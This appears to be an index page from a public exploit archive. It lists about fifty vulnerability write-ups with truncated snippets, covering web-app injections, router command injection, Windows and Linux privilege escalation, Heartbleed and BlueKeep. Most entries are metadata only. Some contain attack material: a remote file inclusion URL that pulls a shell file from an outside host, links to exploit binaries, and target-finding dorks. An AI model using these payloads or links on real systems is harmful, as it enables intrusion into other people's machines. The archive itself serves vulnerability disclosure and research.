LiteCart 2.1.2 - Arbitrary File Upload
LiteCart 2.1.2 - Arbitrary File Upload Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload Date: 2018-08-27 Exploit Author: Haboob Team Software Link: https://www.litecart.net/downloading?version=2.1.2 Version: 2.1.2 CVE : CVE-2018-12256 1. Description admin/vqmods.app/vqmods.inc.php in LiteCar...
rConfig 3.9.4 - search.crud.php Remote Command Injection
rConfig 3.9.4 - search.crud.php Remote Command Injection Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection Date: 2020-03-21 Exploit Author: Matthew Aberegg, Michael Burkey Vendor Homepage: https://www.rconfig.com Software Link:...
Microsoft VSCode Python Extension - Code Execution
Microsoft VSCode Python Extension - Code Execution VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the Visual Studio Code Python extension. TL;DR: VScode may use code from a virtualenv found in the project folder...
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape Date: 2020-01-07 Exploit Author: Harrison Neal, PatchAdvisor Vendor Homepage: https://tomcat.apache.org/ Software Link:...
AsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution
AsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution Unauthenticated LAN remote code execution in AsusWRT Discovered by Pedro Ribeiro, Agile Information Security Disclosure: 22/01/2018 / Last...
ClipShare Pro 2006-2007 - chid SQL Injection
Veyon 4.3.4 - VeyonService Unquoted Service Path
Veyon 4.3.4 - VeyonService Unquoted Service Path Exploit Title: Veyon 4.3.4 - 'VeyonService' Unquoted Service Path Discovery by: Víctor García Discovery Date: 2020-03-23 Vendor Homepage: https://veyon.io/ Software Link:...
Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
Microtik SSH Daemon 6.44.3 - Denial of Service PoC Exploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service PoC Author: Hosein Askari Date: 2020-03-18 Vendor Homepage: https://mikrotik.com/ Model: hAP lite Processor architecture: smips Affected Version: through 6.44.3 CVE: N/A Description: ...
Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)
Microsoft Windows - AppX Deployment Service Local Privilege Escalation 3 CVE-2019-0841 BYPASS 2 There is a second bypass for CVE-2019-0841. This can be triggered as following: Delete all files and subfolders within "c:\users%username%\appdata\local\packages\Microsoft.MicrosoftEdge8wekyb3d8bbwe"...
Joomla! Component com_newsfeeds 1.0 - feedid SQL Injection
Joomla! Component com_newsfeeds 1.0 - feedid SQL Injection Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection Date: 2020-03-10 Author: Milad Karimi Software Link: Version: Category : webapps Tested on: windows 10 , firefox CVE : CWE-89 Dork:...
rConfig 3.9 - searchColumn SQL Injection
rConfig 3.9 - searchColumn SQL Injection Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection Exploit Author: vikingfr Date: 2020-03-03 CVE-2020-10220 Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfigCVE-2020-10220.py Vendor Homepage: https://rconfig.com/ see al...
Microsoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation
Microsoft Windows 10 Build 1803 1903 - COMahawk Local Privilege Escalation EDB Note Download: - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-1.exe - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47684-2.zip COMahawk...
xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation
xorg-x11-server 1.20.3 (Solaris 11) - inittab Local Privilege Escalation #!/bin/sh Exploit Title: xorg-x11-server A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the...
μTorrent (uTorrent) ClassicWeb - JSON-RPC Remote Code Execution Information Disclosure
μTorrent (uTorrent) ClassicWeb - JSON-RPC Remote Code Execution Information Disclosure By default, uTorrent creates an HTTP RPC server on port 10000 (uTorrent classic) or 19575 (uTorrent web). There are numerous problems with these RPC servers that can be exploited by any website using XMLHTTPRequest. T...
PHPKB Multi-Language 9 - Authenticated Remote Code Execution
PHPKB Multi-Language 9 - Authenticated Remote Code Execution Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link:...
Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash
Binary File Descriptor Library libbfd - Out-of-Bounds Crash Many shell users, and certainly a lot of the people working in computer forensics or other fields of information security, have a habit of running /usr/bin/strings on binary files originating from the Internet. Their understanding is tha...
GNU Bash - Environment Variable Command Injection (Metasploit)
GNU Bash - Environment Variable Command Injection Metasploit require 'msf/core' class Metasploit3 'bashedCgi', 'Description' = %q Quick & dirty module to send the BASH exploit payload CVE-2014-6271 to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. , 'Author...
Ricoh Printer Drivers - Local Privilege Escalation
Ricoh Printer Drivers - Local Privilege Escalation / This proof of concept code monitors file changes on Ricoh's driver DLL files and overwrites a DLL file before the library is loaded CVE-2019-19363. Written by Pentagrid AG, 2019. Cf...
OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation
OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010 This issue affects OpenSSH if privilege separation is disabled (config option UsePrivilegeSeparation=no). While privilege separatio...
ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - .asx Local Stack Overflow
ASX to MP3 Converter 1.82.50 Windows 2003 x86 - .asx Local Stack Overflow / ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак недействительный 31337 Team holahola https://www.exploit-db.com/exploits/38382/ Winblows 2k3 / include include include int main int i; char overwriteoffset =...
OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure
OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure #!/usr/bin/python Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford. The author disclaims copyright to this source code. import sys import struct import socket import time import select import re...
Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion
Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion Coppermine Photo Gallery v1.2.2b for...
Zentrack 2.22.32.4 - index.php Remote File Inclusion
Zentrack 2.22.32.4 - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote...
cPanel 5.0 - Guestbook.cgi Remote Command Execution (4)
cPanel 5.0 - Guestbook.cgi Remote Command Execution 4 source: https://www.securityfocus.com/bid/6882/info A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cg...
Wordpress Plugin Search Meter 2.13.2 - CSV injection
Wordpress Plugin Search Meter 2.13.2 - CSV injection Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection Google Dork: N/A Date: 2020-03-10 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://thunderguy.com/semicolon/ Software Link:...
Microsoft Windows 7 (x86) - BlueKeep Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free
Microsoft Windows 7 x86 - BlueKeep Remote Desktop Protocol RDP Remote Windows Kernel Use After Free EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47683.zip import rdp import socket import binascii import time def poolsprays, crypter, payload...
MikroTik RouterOS 6.45.6 - DNS Cache Poisoning
MikroTik RouterOS 6.45.6 - DNS Cache Poisoning Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning Date: 2019-10-30 Exploit Author: Jacob Baines Vendor Homepage: https://mikrotik.com/ Software Link: https://mikrotik.com/download Version: 6.45.6 Stable and below or 6.44.5 Long-term and...
XiongMai uc-httpd 1.0.0 - Buffer Overflow
XiongMai uc-httpd 1.0.0 - Buffer Overflow Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow Date: 2018-06-08 Exploit Author: Andrew Watson Software Version: XiongMai uc-httpd 1.0.0 Vendor Homepage: http://www.xiongmaitech.com/en/ Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on...
Tagger Luxury Edition - BBCodeFile Remote File Inclusion
Tagger Luxury Edition - BBCodeFile Remote File Inclusion Tagger v3 = BBCodeFile Remote file inclusion Discovered by : Morgan Error in : tags.php include$BBCodeFile; Vendor Website: http://www.venturenine.com PoC: http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat? Google dor...
AnyBurn 4.8 - Buffer Overflow (SEH)
AnyBurn 4.8 - Buffer Overflow SEH Exploit Title: AnyBurn 4.8 - Buffer Overflow SEH Date: 2020-03-09 Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Authors: "Richard Davy/Gary Nield" Tested Version: 4.8 32-bit Tested on: Windows 10 Enterpri...
Microsoft Visual Basic 2010 Express - XML External Entity Injection
Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection Exploit Author: ZwX Exploit Date: 2019-12-03 Version Software : 10.0.30319.1 RTMRel Vendor Homepage : https://www.microsoft.com/ Software Link:...
Cisco RV300 RV320 - Information Disclosure
Cisco RV300 RV320 - Information Disclosure Exploit Title: 6coRV Exploit Date: 01-26-2018 Exploit Author: Harom Ramos Horus Tested on: Cisco RV300/RV320 CVE : CVE-2019-1653 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning from fakeuseragent import UserAgent d...
HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Date: 2020-03-11 Exploit Author: Ismail Akıcı Vendor Homepage: http://hrsale.com/ Software Link : http://demo.hrsale.com/ Software : HRSALE v1.1.8 Product Version: v1.1.8...
Blueimps jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit
Blueimps jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit Exploit Title: Exploit for Blueimp's jQuery File Upload include include include include include include define BSIZE 1024 define DEBUG 1 define TESTONLY 0 void buildstring char p, char path, char arg, char ar1, int func; int main...
VirtualBox 5.2.6.r120293 - VM Escape
VirtualBox 5.2.6.r120293 - VM Escape Oracle fixed some of the issues I reported in VirtualBox during the Oracle Critical Patch Update - April 2018. CVE-2018-2844 was an interesting double fetch vulnerability in the VirtualBox Video Acceleration (VBVA) feature affecting Linux hosts. VBVA feature works o...
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock) #!/usr/bin/python Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC Date: 2014-09-29 Author: @fdiskyou e-mail: rui at deniable.org Version: 4.1 Tested on: Debian, Ubuntu, Kali CVE: CVE-2014-6277,...
Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion
Mambo Component SimpleBoard 1.1.0 - Remote File Inclusion Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo component remote inclusion vulnerability download : http://mamboxchange.com/frs/download.php/6920/Simpleboard-1.1.0-Stable.zip bug found in file fileupload.php :...
Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection
Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection RedTeam Pentesting discovered a command injection vulnerability in the web-based certificate generator feature of the Cisco RV320 router. Details ======= Product: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others Affected...
Linux Kernel 4.15.x 4.19.2 - map_write() CAP_SYS_ADMIN Local Privilege Escalation (polkit Method)
Linux Kernel 4.15.x 4.19.2 - map_write() CAP_SYS_ADMIN Local Privilege Escalation (polkit Method) #!/bin/sh EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47167.zip wrapper for Jann Horn's exploit for CVE-2018-18955 uses polkit technique ---...
Joomla! Component JComments 2.1 - ComntrNam Cross-Site Scripting
Joomla! Component JComments 2.1 - ComntrNam Cross-Site Scripting source: https://www.securityfocus.com/bid/40230/info The JComments component for Joomla! is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue...
ProficySCADA for iOS 5.0.25920 - Password Denial of Service (PoC)
ProficySCADA for iOS 5.0.25920 - Password Denial of Service PoC Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service PoC Author: Ivan Marmolejo Date: 2020-03-22 Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142 Software Link: App Store for iOS devices...
QNAP Netatalk 3.1.12 - Authentication Bypass
QNAP Netatalk 3.1.12 - Authentication Bypass Exploit Title: QNAP Netatalk Authentication Bypass Date: 12/20/2018 Original Exploit Author: Jacob Baines Modifications for QNAP devices: Mati Aharoni Vendor Homepage: http://netatalk.sourceforge.net/ Software Link:...
Apache CouchDB 2.1.0 - Remote Code Execution
Apache CouchDB 2.1.0 - Remote Code Execution Title: Apache CouchDB 2.1.0 - Remote Code Execution Author: Cody Zacharias Shodan Dork: port:5984 Vendor Homepage: http://couchdb.apache.org/ Software Link: http://archive.apache.org/dist/couchdb/source/1.6.0/ Version: = 1.7.0 and 2.x - 2.1.0 Tested on...
radnics gold 5.0 - Multiple Vulnerabilities
PHPKB Multi-Language 9 - Authenticated Directory Traversal
PHPKB Multi-Language 9 - Authenticated Directory Traversal Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link:...
Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Date: 2020-03-05 Exploit Author: Miguel Mendez Z. Vendor Homepage: www.sumavision.com Software Link:...
Pandora 7.0NG - Remote Code Execution
Pandora 7.0NG - Remote Code Execution Exploit Title: Pandora 7.0NG - Remote Code Execution Date: 2019-11-14 Exploit Author: Askar @mohammadaskar2 CVE: CVE-2019-20224 Vendor Homepage: https://pandorafms.org/ Software link: https://pandorafms.org/features/free-download-monitoring-software/ Version:...
ashNews 0.83 - pathtoashnews Remote File Inclusion
ashNews 0.83 - pathtoashnews Remote File Inclusion DEVIL TEAM THE BEST POLISH TEAM ashnews v0.83pathtoashnews - Remote File Include Vulnerabilities Script site: http://dev.ashwebstudio.com/ dork: News powered by ashnews Find by Kacper Rahim. Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam...
OpenSMTPD 6.4.0 6.6.1 - Local Privilege Escalation + Remote Code Execution
OpenSMTPD 6.4.0 6.6.1 - Local Privilege Escalation + Remote Code Execution Exploit Title: OpenSMTPD 6.6.1 - Local Privilege Escalation Date: 2020-02-02 Exploit Author: Marco Ivaldi Vendor Homepage: https://www.opensmtpd.org/ Version: OpenSMTPD 6.4.0 - 6.6.1 Tested on: OpenBSD 6.6, Debian GNU/Linu...
Modern POS 1.3 - SQL Injection
Modern POS 1.3 - SQL Injection Exploit Title: Modern POS 1.3 - SQL Injection Dork: N/A Date: 2019-01-13 Exploit Author: Ihsan Sencan Vendor Homepage: http://itsolution24.com/ Software Link: https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683 Version: 1.3...